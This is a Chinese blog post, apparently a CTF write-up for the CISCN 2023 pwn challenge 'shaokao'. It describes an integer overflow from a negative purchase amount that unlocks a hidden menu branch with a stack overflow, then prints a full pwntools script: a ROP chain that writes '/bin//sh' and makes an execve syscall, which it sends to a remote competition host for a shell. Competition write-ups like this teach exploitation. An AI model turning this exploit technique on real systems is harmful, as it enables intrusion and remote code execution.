ciscn2023_烧烤摊儿 wp(python3)

最新推荐文章于 2024-02-02 15:30:52 发布
最新推荐文章于 2024-02-02 15:30:52 发布
阅读量714 收藏 2
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kata_Jhin/article/details/130935393
版权

菜狗第一次打国赛,这次就解了俩题

checksec+执行,没有pie,canary开

发现ida东西很多,ldd查看一下

没有pie,可以使用pwntool rop链

menu函数就是输出执行部分字符串的,同时将scanf的数值作为返回值返回,switch对应分支

发现有个被隐藏的分支5,需要own为一

啤酒函数发现存在整数溢出,虽然有unsigned int 但是实际上格式化字符串也是%d,存的地方也是int型,输入附属会导致钱反向增加

而“钱”这个数据主要用于修改own,需要100000块

修改own后就可以进入隐藏分支

用的%s格式化字符串,存在栈溢出

另外这几个函数都没看见canary,可能是其他不需要的函数加载了canary

生成rop链

把'

另外默认生成的是p因此把端口变量换成io

payload:

from pwn import*

io=remote('47.95.212.224',19595)

p =b''
p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e0) # @ .data
p += p64(0x0000000000458827) # pop rax ; ret
p += b'/bin//sh'
p += p64(0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x0000000000447339) # xor rax, rax ; ret
p += p64(0x000000000045af95) # mov qword ptr [rsi], rax ; ret
p += p64(0x000000000040264f) # pop rdi ; ret
p += p64(0x00000000004e60e0) # @ .data
p += p64(0x000000000040a67e) # pop rsi ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x00000000004a404b) # pop rdx ; pop rbx ; ret
p += p64(0x00000000004e60e8) # @ .data + 8
p += p64(0x4141414141414141) # padding
p += p64(0x0000000000447339) # xor rax, rax ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000496710) # add rax, 1 ; ret
p += p64(0x0000000000402404) # syscall


#io=process('./shaokao')
#p=gdb.debug('./shaokao')
elf=ELF('./shaokao')
context(arch='amd64',log_level = 'debug',os = 'linux')
mainadd=elf.symbols['main']

io.sendlineafter(">",b"1")
sleep(1)
io.sendline(b"1")
sleep(1)
io.sendline(b"-10005")
io.sendlineafter(">",b"4")
io.sendlineafter(">",b"5")


payload=b'a'*(0x20+8)+p
io.sendline(payload)
io.interactive()

get shell

Kata_Jhin
关注
漫谈程序员系列:程序员的生活就这样吗
安晓辉生涯——聚焦程序员的职业规划与成长
11-03 3万+
我当了快十年程序员了,终于老得可以来谈谈程序员的生活是什么样子了。看看你是不是和我一样……
西雅图亚马逊1个月入职日记,传闻中的“血汗工厂”真实存在吗?
LaiOffer的博客
08-01 5663
作者介绍: Zack,来Offer学员。硕士毕业于USC CS专业,在湾区startup有1年工作经验,上个月刚刚入职Amazon。 一个月前,我从大农村湾区搬来了虾图,入职Amazon。相比湾区来说,这里没有那么干燥,公共交通方便,房租也更便宜,总之我非常愉快地开始了我的新旅程~这篇文章算是我自己入职亚麻一个月的一个心得总结,如果你也对亚麻的工作、文化、生活等等感兴趣,那就继续读下去吧! ...
PWN · ret2syscall】[CISCN 2023 初赛]烧烤摊儿
Mr_Fmnwon的博客
01-31 547
1、整数溢出增加money2、“购买店铺”到漏洞点3、构造payload:b’/bin/sh\x00’+padding+ret2syscall即可
2023CISCN部分wp
qq_51862722的博客
05-29 860
2023ciscn部分wp
2023 ciscn国赛pwn lojin wp
cainiao78777的博客
05-29 2499
第一次参加国赛,被队友带飞了,pwn只做出来了四个,1381分,第16名,总体来说还可以在所有题目中,也是拿到了pwn题login的一血话说回来,来详细说一下,这个pwn题的解法首先就是能看到这是个没附件的pwn题说明只能通过交互去得到信息,再寻找方向,连接之后应该就是这四个选项。
2023华中赛区ciscn部分wp
qq_42557115的博客
06-29 2609
今年ciscn华中的CTF还行,基本上都肝出来了,拿了个前十,但是awd拿了个倒一....综合一下拿了个第三,可恶,错失国防科技大学参观机会()把CTFwp写一下,供大家参考。赛题不分上下午场了。
2023-ISCC信息安全与对抗竞赛wp-misc(详解,有脚本( •̀ ω •́ ),脚本解析,有附件)
路baby的博客
05-21 7023
2023-ISCC信息安全与对抗竞赛wp-misc(详解,有脚本( •̀ ω •́ ),脚本解析,有附件) 以下是本人的一些解题思路和过程,供各位道友参考 对了不要喷呀如有错误或者心得请联系我 小友看见定即时改正回复 对了小友 我自身实力 交了两个非预期 也是有运气在身(这里本姓名就不再透露了,当然知道的人肯定知道 嘻嘻)
2023天一永安杯部分wp
arcuied
05-22 1476
布尔盲注。
东安2019年事业编招聘考试真题及答案解析打印版(1).docx
10-02
- ④他朝着校门外的瓜子摊儿走去,手伸进裤兜…… - ⑤只有那五分硬币静静地躺在那里…… - ⑥他弯下腰,刚要将它拾起…… - ⑦高跟鞋的声响也渐渐远去。 根据故事情节分析,合理的顺序应该是**④②⑥③①⑦⑤**。...
忻府2016年事业编招聘考试真题及答案解析整理版.docx
10-03
- ④他朝着校门外的瓜子摊儿走去,手伸进裤兜…… - ⑤只有那五分硬币静静地躺在那里…… - ⑥他弯下腰,刚要将它拾起…… - ⑦高跟鞋的声响也渐渐远去。 按照上述方法,正确的排序应该是:④②⑥③①⑦⑤。这样...
Python库 | checksec.py-0.3.1.tar.gz
03-01
python库。 资源全名:checksec.py-0.3.1.tar.gz
checksec.py:Python中的Checksec工具,输出丰富。基于LIEF
03-20
checksec.py Python中的Checksec工具,基于LIEF的丰富输出 目录 概述 一个简单的工具来验证二进制文件的安全性。 编译器可以启用这些属性,以增强可执行文件的安全性并减轻攻击。但是,将它们应用到整个系统可能具有挑战性。 检查您Linux发行版/ Windows发行版为您提供的安全级别! 支持的格式: ELF PE Mach-O 基于: :精美的终端输出格式 :跨平台库,用于解析,修改和抽象ELF,PE和Mach-O格式 要求 设置 视窗 您可以在最新的Github版本中找到checksec.exe : Linux python3 -m venv venv source venv/bin/activate (venv) pip install checksec.py 用法 (venv) checkec <file>... 检查-
企业风控如何搭建四大体系,实现全局防控?
SHUMEITECH的博客
12-09 3581
六年专业反黑产,8000字精华输出,值得收藏
funcanary[CISCN2023初赛]-爆破canary+pie
qq_53928256的博客
05-29 983
根据PIE的保护的特性我们可以知道(请先进行PIE保护的相关学习),地址的后3位是不变的,所以只需要的原先返回地址的基础之上将返回地址的后三位覆盖位system(“/bin/cat flag”)函数调用的地址即可,即为修改为“0x231”(该地址只需要在IDA看偏移地址即可),根据“字符”查找到特殊的字符串“/bin/cat flag”,所以可能存在直接的system(“/bin/cat flag”)函数,通过追踪定位,发现确实存在相应函数。先检查文件的保护以及文件的类型,保护全开,64位程序。
ciscn 2023 初赛 pwn StrangeTalkBot
z1r0的博客
06-02 641
这里坑点是sint64和int64,导致如果用int64需要把index*2,用int64死活不能成功。uaf,然后可以edit,但是需要写一个proto,然后生成一下序列化python文件。生成之后导入到exp中,正常的2.31 orw利用。
CISCN2023初赛pwn
qq_51627915的博客
05-29 397
2023ciscn的初赛
ciscn2023初赛 writeup
S4n_v1的博客
05-28 3289
第十六届全国大学生信息安全竞赛创新实践能力赛初赛wppwn 2/6, misc 5/7, crypto 4/7, re 2/6, web 3/6
2023年第十六届全国大学生信息安全竞赛能力赛部分(WP
xccwxy的博客
05-29 2504
2023年第十六届全国大学生信息安全竞赛能力赛部分(WP
NSSCTF刷题笔记pwn5——[BJDCTF 2020]babystack2.0
qq_45692883的博客
01-30 375
在gdb中,我们可以看到栈溢出的大小是16+8,24字节。使用gdb动态调试,找到栈溢出的大小,ida提示是4。在read中参数nbytes是一个无符号的整数。那么即可为我们写入255个数据,就完成栈溢出。我们发现对比时nbytes是一个整数。估计栈溢出就发生在第二个参数传入时。首先问我们要一个数字,要小于10。而我们最多只能写入9个长度的数据。-1在无符号数中代表255。然后再问我们要一个值。
NSSCTF刷题笔记pwn7——[watevrCTF 2019]Voting Machine 1
最新发布
qq_45692883的博客
02-02 474
main函数,打印一串大小,看到gets函数,存在栈溢出。可以看到输入的AAAA距离返回地址差10个比特。找到一个读取flag.txt的函数。那么写代码,控制流到这个函数试试看。看了一下没有找到system函数。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值